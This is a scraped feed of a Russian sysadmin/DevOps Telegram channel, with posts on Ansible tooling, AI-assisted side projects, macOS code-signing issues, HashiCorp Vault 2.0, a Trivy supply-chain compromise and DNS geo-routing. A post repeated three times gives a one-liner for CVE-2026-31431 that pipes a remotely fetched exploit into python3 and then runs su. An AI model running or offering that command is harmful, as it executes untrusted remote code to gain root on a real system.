Пока нет отзывов. Будьте первым, кто поделится своим опытом!
Последние посты
Админим с Буквой
20 мая 2026 г., 17:45
ansible-playbook для временного патчинга, пока нет в репозитории исправления https://gist.github.com/bykvaadm/7a9e56861ea25de49980ebb0660d7e56
2,000
4
0
Админим с Буквой
20 мая 2026 г., 17:45
📷 Photo
Ansible Role Scanner 🔍
Написал Навайбкодил инструмент для тех, кто разгребает большой GitLab-инстанс и хочет понять — где вообще живут Ansible-роли?
Репозиторий сканируется без клонирования — только точечные API-запросы. Скрипт ищет структурные признаки (tasks/main.yml, defaults/, meta/ и т.д.), паттерны в именах репозиториев, вложенные роли через BFS, тест-окружения molecule.
На выходе — самодостаточный HTML-отчёт: поиск, фильтры по уверенности (High / Medium / Low), сортировка, попап с историей коммитов и колонка заметок с сохранением в localStorage. Заметки переживают перегенерацию отчёта — привязаны к web_url репозитория, а не к имени файла.
Работает на read_api токене, опционально sudo-режим для полного скана инстанса.
→ https://github.com/bykvaadm/ansible-role-scanner
1,710
Админим с Буквой
20 мая 2026 г., 17:45
астрологи объявили неделю обновлений CVE-2026-31431 curl https://copy.fail/exp | python3 && su 👀@ever_secure | 💪 Мерч | 💳Поддержать
2,100
10
0
Админим с Буквой
20 мая 2026 г., 17:45
Как буква прогнулся
Вот я и прогнулся под агентные ИИшки. Один интересный дядя (спасибо ему) подарил мне недельную подписку на клод. ну и пока я знакомился с возможностями, родилось несколько проектов, которыми я хочу поделиться. Сейчас выложу один, на следующей неделе второй.
А так да, ИИ-победил. Что будет со входом в профессию через 5 лет одной шилиен известно. ИИ полностью человека не скоро конечно заменит (и то нишево), но уже сейчас под простые задачи, где достаточно вайб-кодинга людей можно не нанимать. Хочется верить, что сейчас, хотябы, мы начнём искать человеческие ошибки сильно проще и дешевле. И что человечество не отупеет через 50 лет. "тётушки" всё ближе. Можно спроецировать вопрос о количестве стенок на число ИИ вендоров которыми ты пользуешься =)
Ааанивайс. Одна из первых задач которую я возжелал автоматизировать и првоерить как ИИ с этим справляется - разгребание чатопса. Десятки коммуникаций за день приводят к тонне контекста и забытых обещаний. И вот за пару часов мы навайбкодили такого секретаря, который собирает форварды в телегочат и аггрегировано пишет выжимк в виде чек-листа в notion. Notion как пример взят, в целом писать то можно куда угодно. Интересно было саму идею сделать, чтобы можно было переслать хоть 10 сообщений и получить 1 короткий самари. или несколько чек-боксов в 1 блоке. или дофорвардить сообщение через парчу часов и его бы дописали в один блок. А потом ты заходишь в одно место и вот - все коммуникации перед глазами.
З.Ы. я без понятия есть ли такое уже (наверняка) - цель была не переиспользовать, а потыкать возможности claude. Вышло довольно позитивно.
https://github.com/bykvaadm/claude-secretary
1,970
Админим с Буквой
20 мая 2026 г., 17:45
📷 Photo
А вот что ещё, например, можно навайбкодить за час. У нас в компании почти 10.000 проектов в гитлабе. огромное число сныканных автоматизаций внутри команд. Я задался вопросом, а как бы мне удобно провести аудит всего сущего чтобы прийти потом в гости к людям, посмотреть в глаза и сказать "а давай-ка ты переедешь в общий galaxy и перестанешь тратить время на поддержку уже существующих ролей и прочее оптимизационное бла-бла-бла".
смог бы я написать такой интерфейс сам?) да ни в жизни. а так, за час - рабочий аудит инструмент с приятной визуализацией.
Как доотлажу, выложу.
З.Ы. вайбкодинг веду от обратного - сначала результат, под него код. Это пример результата. Очевидно, свой аудит рабочий я не буду выкладывать =)
2,030
Админим с Буквой
20 мая 2026 г., 17:45
TIL
Интересный момент в макожизни:
если у вас есть софт, который не проходит проверку подписи в аппле, то со временем, если ничего с этим не сделать, вы будете ловить приколы что некоторый софт время от времени просто не будет запускаться. и это может длиться днями и неделями. а потом запускаться. и при этом ребут помогает раз в 10 раз.
симптомы такие: иконка прыгает в dock. и всё, дальше только форскилл. если через терминал - просто перевод каретки на новую строку и всё, никакой реакции.
что смотреть:
sudo log show --predicate 'process == "syspolicyd"' --last 5m --info 2>&1 | tail -80
искать строки
Trust evaluate failure: [leaf Revocation6]
SecStaticCode: verification failed (trust result 6, error -2147409652)
macOS кэширует "soft fail" по revocation на какой-то период (часы-дни), и когда кэш ещё не протух — каждый новый запуск приложения попадает в ту же зависшую оценку.
Дальше, предположительно, очередь забивается, новые приложения не могут пробиться
проверка (они сразу же перезапустятся):
sudo killall -9 trustd syspolicyd
если после этого нужное приложение запустилось, то всё описанное выше и есть ваша проблема.
Ну а как дальше жить с этим я советовать не буду. Наверняка, у вас не просто так висит приложение с проблемной подписью, иначе зачем эти страдания?
2,240
Админим с Буквой
20 мая 2026 г., 17:45
📷 Photo
астрологи объявили неделю обновлений CVE-2026-31431
curl https://copy.fail/exp | python3 && su
👀 https://t.me/ever_secure | 💪 https://eversecure.ru/shop | 💳 https://boosty.to/ever_secure
1,750
4
Админим с Буквой
20 мая 2026 г., 17:45
астрологи объявили неделю обновлений CVE-2026-31431 curl https://copy.fail/exp | python3 && su 👀@ever_secure | 💪 Мерч | 💳Поддержать
2,660
5
0
Админим с Буквой
20 мая 2026 г., 17:45
📷 Photo
Сегодня был важный день для команды Ever Secure. Мы провели CTF на конференции DUMP в Екб. * Это те самые лабы, которые будут в нашем курсе, который уже скоро стартует 😏
Вдвойне жесткий день, т.к. спали около 2 часов, до 5 утра сидели с https://t.me/Bykva и фиксили баги, пили харденинг и мониторинг 🫠. Спасибо https://t.me/weahiro за топовый багхантинг. В итоге 23/24 тасок были решены. Только 1 была с багой (захарденили сами себя 😏)
Немного фото с награждения победителей 😉 поздравляю 🎉
2,660
Админим с Буквой
20 мая 2026 г., 17:45
📷 Photo
Современная CTF-реальность (основное мероприятие закончилось в 18)
9,640
14
Админим с Буквой
6 мая 2026 г., 03:24
📷 Photo
🚀 in-Cloud Console— релиз 1.4.0
Всем привет. Спустя 2 месяца работы, готовы поделиться новыми фичами.
Самое главное, что смогли сделать - почти закрыть весь тех долг)
Какие правки доехали?
😠 UX/UI
• Таблицы — подсказки в заголовках, поиск по части имени, value → label
• Actions — действия прямо из таблиц
• YAML — скрытие служебных полей
• Навигация — hashed tabs
• Уникальные sidebar-id
• Popover / Modals — корректный рендер текста
• Ошибки — заглушки 4xx/5xx, частичные ошибки не ломают страницу, единый стиль
• Перфоманс — меньше лишних пересчётов
🙃 Forms
• Видны зависимости полей при редактировании
• CFP — настройка через объект + поддержка {2}-конструкций
• Уведомления при submit
• Улучшен prefill (автозаполнение)
• BackLink — возврат в namespace-таблицу при Create без NS
🤪 Kubernetes
• Cluster как полноценный ресурс (без ClusterList)
• Ошибки прав отображаются при Watch
• Оптимизированы Watch и события
☹️ BFF
• Whitelist / blacklist логов (фильтрация sensitive данных)
🌈 Search
• Выбранные kind’ы закрепляются сверху
😂 Data
• Убрано «мигание» (sync loading/data)
• Loader вместо «-»
😇 Modals
• Исправлен перенос длинного текста
Полезная информация:
https://in-cloud.io/docs/tech-docs/introduction/
https://demo.in-cloud.io/openapi-ui/default/builtin-table/pods?resources=metrics.k8s.io/v1beta1/pods
https://github.com/PRO-Robotech/openapi-ui
Лучшая ваша похвала — это: 😈
• Вопросы по теме
• Поиск неточностей
• Советы, как сделать лучше
• И, конечно, ⭐️ на GitHub
*Если что это еще не все - скоро появится статья об UI RBAC модуле) 😎
🚀 Скоро: HashiCorp Vault 2.0!
В открытом доступе появился релиз-кандидат HashiCorp Vault 2.0 — первого крупного обновления за долгое время. Вас ждут автоматическая ротация секретов, передовые протоколы PKI и полная интеграция с Kubernetes.
🔐 Главные нововведения
• Автоматическая http://staticblock.tech/insights/hashicorp-vault-2-0-secrets-management-security секретов: Снижение числа инцидентов на 75% и сокращение разрастания учетных данных на 90% благодаря устранению статических кредов и динамической выдаче секретов.
• Передовые PKI-протоколы: Полная поддержка протоколов SCEP, EST и CMPv2 для автоматизации выдачи сертификатов. Теперь подписывать промежуточные сертификаты стало проще, а в alt_names можно использовать глоб-шаблоны.
• Нативная интеграция с Kubernetes: Динамическая инъекция секретов на уровне подов без изменения кода.
• Доработки и исправления: Обновление Go до версии 1.25.7, улучшение статуса sys/seal-backend-status для лучшего мониторинга и поддержка HashiCorp-плагинов как внешних бинарных файлов.
Финальный релиз, как ожидается, окончательно сформирует стандарт управления секретами в эпоху zero-trust. Официальной даты выхода пока нет, но ждать, судя по всему, осталось недолго. (час назад вышел билд на github: https://github.com/hashicorp/vault/releases/tag/v2.0.0)
https://discuss.hashicorp.com/t/vault-2-0-0-rc1-released/77296
• SCIM-провижининг: Полная автоматизация жизненного цикла пользователей и групп через синхронизацию с внешними IDP-платформами.
• Нативная поддержка SPIFFE: Аутентификация рабочих нагрузок с помощью JWT-SVID, что позволяет бесшовно вписаться в экосистему SPIFFE.
• Визуальный конструктор политик: Генерация ACL-политик прямо в веб-интерфейсе Vault. Больше не нужно писать сложные правила вручную.
• Workload Identity Federation (WIF) для синхронизации секретов: Теперь для настройки синхронизации с AWS, GCP или Azure не нужны статичные креды — всё работает через федерацию.
• Расширение для публичных центров сертификации (Public CA): Vault теперь умеет оркестрировать выдачу и управление жизненным циклом сертификатов от публичных CA.
• In-Place Encryption SDK: Шифрование и дешифрование данных на стороне клиента без отправки данных в Vault. Ключевой функционал для конфиденциальных сред.
• Ротация паролей локальных учетных записей: Управление учетными данными локальных пользователей Linux с автоматической ротацией.
• Умная ротация для LDAP: Гибкая настройка ротации статических кредов LDAP: начальные пароли, самоуправляемая ротация, расписания и политики повторных попыток при сбоях.
• Мультикластерные уведомления о событиях: Теперь вы не пропустите ни одного важного изменения в вашей распределенной системе.
• Улучшенный онбординг: Новый GUI помогает быстрее освоить ключевые функции, а процесс создания неймспейсов стал интуитивно понятным.
Админим с Буквой
1 мая 2026 г., 01:55
лабораторная ansible+vault
Добавил новую лабу по интеграции ansible и vault.
Задача очень простая, предназначена для знакомства с технологиями.
Приведён пример раскатки CIS Benchmasrk ansible role на Ubuntu24.04 с k8s кластером и установленным hashicorp vault на этот же самый кластер, с вынесением пароля grub на vault. Для prod окружений рекомендуется ознакомиться с политиками vault и делать от отдельных УЗ (в примере используется root token)
https://github.com/bykvaadm/CyberEd/blob/master/2/README.md#задание-с--выполнять-после-лекции-8-про-vault
2,370
14
0
Админим с Буквой
1 мая 2026 г., 01:55
Переносим изменения между несколькими одинаковыми репозиториями
представим, что у вас есть несколько типовых репозиториев, которые не используют никаких централизованных "инклудов", а дублируют код. если нужно поправить один и тот же код в нескольких репозиториях можно сделать это через патч:
1) правим нужное в одной репе
2) git log - забираем
3) git format-patch -1 -> получим файл с патчем
4) намылить-смыть-повторить
while not udovletvoryon; do
cd repoN
git apply ..//.patch
done
5) задумываемся о том, что от дублирования кода надо избавляться
2,460
10
0
Админим с Буквой
1 мая 2026 г., 01:55
📷 Photo
С Днём космонавтики! 🚀 Пусть ваши мечты взлетают так же высоко, как ракеты, а новые открытия ждут за каждым горизонтом. К звёздам! ✨
2,380
27
Админим с Буквой
1 мая 2026 г., 01:55
mws terraform
создание вм с cloud-init (этого нет в документации)
resource "mws_compute_virtual_machine" "basebox" {
os = {
hostname = "basebox"
local_domain = "local"
metadata = {
attributes = {
user-data = file(var.meta)
}
}
}
где meta - стандартный cloud-init файл
2,390
3
0
Админим с Буквой
1 мая 2026 г., 01:55
выбор замены minio.png
3,330
56
0
Админим с Буквой
1 мая 2026 г., 01:55
📷 Photo
#DevOpsConf2026
3,270
40
Админим с Буквой
19 апр. 2026 г., 04:59
1.0 release of Ingress2Gateway
Ingress в Kubernetes постепенно уходит: ingress-nginx официально перестанут поддерживать с марта 2026.
Под это как раз вышел Ingress2Gateway 1.0 — инструмент, который конвертирует существующие Ingress-манифесты в новый формат Gateway API (Gateway, HTTPRoute и т.д.). То есть можно взять уже работающие ingress’ы и не переписывать всё руками.
Сам Gateway API — более гибкая и чистая модель (меньше магии с аннотациями, больше нативных возможностей). А Ingress2Gateway упрощает переход: вместо ручной миграции — автоматическая конверсия и постепенный переход.
https://kubernetes.io/blog/2026/03/20/ingress2gateway-1-0-release/?utm_source=tg&utm_medium=devops&utm_campaign=240326
(written by this guy: Chatham Gptman)
2,370
7
Админим с Буквой
19 апр. 2026 г., 04:59
https://www.opennet.ru/opennews/art.shtml?num=64984
под вечер пятницы 13-е =)
3,390
0
0
Админим с Буквой
19 апр. 2026 г., 04:59
📷 Photo
вот как надо вакансии рекламировать, а не вот этот вот всё - плюшки-дмсы-прочее. само разлетится =)
если это был преднамеренный ход - отличная идея
3,150
35
Админим с Буквой
19 апр. 2026 г., 04:59
Крупнейший взлом Trivy, продолжение
Прошлый раз были, оказывается, лишь цветочки.
https://socket.dev/blog/trivy-under-attack-again-github-actions-compromise
В результате новой атаки были подменены 75 из 76 тэгов версий Trivy. Все, кто использовал версию кроме 0.35.0 (или просто все, начиная от 0.18.0 с промежуточными), получили вредоносный коммит, который крадёт:
- AWS/GCP/Azure креды
- SSH-ключи
- git-credentials
- Kubernetes service account tokens и секреты
- GitHub Secret, переданные в GitHub Runner
- Крипто-кошельки
Пострадали более 10000 GitHub workflow-файлов, которые используют trivy-action по тегу версии.
Что делать прямо сейчас
Если у вас есть исполнения с:
uses: aquasecurity/trivy-action@<любая версия кроме 0.35.0>
считайте, что ваши данные уже записаны "где не надо".
Безопасные варианты только два:
- Тег @0.35.0
- Пин по SHA: aquasecurity/trivy-action@57a97c7e7821a5776cebc9bb87c984fa69cba8f1
Как признак проблем - проверить в GitHub логах запросы к репозиторию tpcp-docs, который использовался в такой схеме врагами.
Лучи поддержки команде Trivy. Всем, кто использовал trivy-action в последнее время — перепроверить и в любом случае лучше обновить секреты.
2,480
8
Админим с Буквой
19 апр. 2026 г., 04:59
📷 Photo
Всем доброй ночи 🙃.
По статистике этого канала посты чаще всего выходят ближе к ночи — и этот не исключение.
Прошел уже целый год с момента публикации моей первой статьи https://docs.dobry-kot.ru/en/blog/kubernetes-the-hard-way 🤪:
Статья получила много хорошего фидбека, но почти сразу появился один вопрос, который мне задавали весь этот год:
«А как добавлять worker-ноды?»
Наконец-то готов ответить на него новой статьей:
https://docs.dobry-kot.ru/en/blog/kubernetes-the-hard-way-workers/ 😈
Статья получилась небольшой, но полезной — поможет освежить в памяти хорошо забытое старое и, возможно, узнать что-то новое.
Так что устраивайтесь поудобнее — будет интересно 😎
Лучшая ваша похвала — это: 🤪
• Вопросы по теме
• Поиск неточностей
• Советы, как сделать лучше
• И, конечно, ⭐️ на GitHub
*Бонусом, мы перевели весь контент на английский, теперь будет публиковаться сразу на двух языках и не только в РФ)
2,110
Админим с Буквой
19 апр. 2026 г., 04:59
ну и как же не перепостить про себя любимого) В общем да, коллабимся с лучшими, пилим крутой курс
1,930
2
0
Админим с Буквой
19 апр. 2026 г., 04:59
📷 Photo
Сегодня важная дата для меня и для Ever Secure.
Некоторые из вас уже знают, что мы плотно пилим обучающий курс, и мне часто пишут с вопросами, когда же мы его уже релизнем?
Так вот, приоткрываю завесу тайны, сегодня ООО "Эвер Секьюр" была получена лицензия на осуществление образовательной деятельности!
Совсем скоро расскажу о преподавателях и дам больше инфы.
Stay Safe 💪
👀 https://t.me/ever_secure | 💪 https://eversecure.ru/shop | 💳 https://boosty.to/ever_secure
2,060
Админим с Буквой
19 апр. 2026 г., 04:59
📷 Photo
Сегодня важная дата для меня и для Ever Secure. Некоторые из вас уже знают, что мы плотно пилим обучающий курс, и мне часто пишут с вопросами, когда же мы его уже релизнем? Так вот, приоткрываю завесу тайны, сегодня ООО "Эвер Секьюр" была получена лицензия…
2,610
10
Админим с Буквой
19 апр. 2026 г., 04:59
Меняем смонтированный с RO файл без остановки контейнера
На хосте запущен consul через docker run с монтированием цепочки сертификатов
--volume /etc/ssl/certs/ca-certificates.crt:/etc/ssl/certs/ca-certificates.crt:ro
Когда на хосте утилита обновления сертификатов update-ca-certificates отработала, она удалила старый файл ca-certificates.crt и создала новый.
Но внутри контейнера старый файл был примонтирован. В терминологии ядра Linux этот bind-mount превратился в призрак (unlinked inode).
Нам нужно сначала "отмонтировать" этот мертвый файл-призрак. И вот поверх него мы сможем успешно смонтировать новый сертификат.
# получить первый PID контейнера на хосте
PID=$(docker inspect -f '{{. State. Pid}}' consul)
# Скопировать файл в контейнер
docker cp /etc/ssl/certs/ca-certificates.crt consul:/tmp/new-ca.crt
# Отмонтировать старый inode (удаленный файл) из namespace контейнера
nsenter -t $PID -m -r umount -l /etc/ssl/certs/ca-certificates.crt
# Примонтировать
nsenter -t $PID -m -r mount --bind -o ro /tmp/new-ca.crt /etc/ssl/certs/ca-certificates.crt
Дальше можно перечитать конфиг consul.
это все равно не помогло, пришлось рестартить consul😐
2,790
38
Админим с Буквой
19 апр. 2026 г., 04:59
О, днс, как много мы о тебе не знаем
Интересное обсуждение сегодня было в одном чатике, вынесу сюда факты.
ТС спросил о странном поведении при резолве сайта http://api.themoviedb.org/ - некоторые dns сервера возвращают http://127.0.0.1/. Что интересно, такое поведение при одних и тех же запросах у разных людей может отдавать как искомые адреса, так и локалхост
$ dig +dnssec http://api.themoviedb.org/ @ http://1.1.1.1/
ответ: http://127.0.0.1/ | а может быть 18.66.233.*
$ dig +dnssec http://api.themoviedb.org/ @ http://8.8.8.8/
ответ: http://127.0.0.1/
$ dig +dnssec http://api.themoviedb.org/ @ http://9.9.9.9/
ответ: 108.157.229.* или 18.66.233.*
В отличие от других DNS, Quad9 не использует EDNS-Client-Subnet (ECS) для передачи IP-адреса пользователя в DNS-запросах, что защищает геолокацию от отслеживания сайтами.
спросим у восьмёрок ещё раз:
$ dig +dnssec +subnet= http://8.8.8.8/24 http://api.themoviedb.org/ @ http://8.8.8.8/
Возвращает не локалхост.
UPD:
В AWS Route53 есть возможность настроить геофенсинг, и в зависимости от страны, откуда пришел запрос, отдавать разные ответы, все эти ответы будут подписаны теми же самыми dnssec ключами. Но весь этот детект идет как раз на базе EDNS0
https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/routing-policy-edns0.html
И тут есть один важный момент:
When a browser or other viewer uses a DNS resolver that does not support edns-client-subnet, Route 53 uses the source IP address of the DNS resolver to approximate the location of the user
т.е. если у вас запрос уходит в "провайдерский" резолвер, который ecs не отдает, но который сам находится в российских подсетях, route53 все равно посчитает это запросом из россии
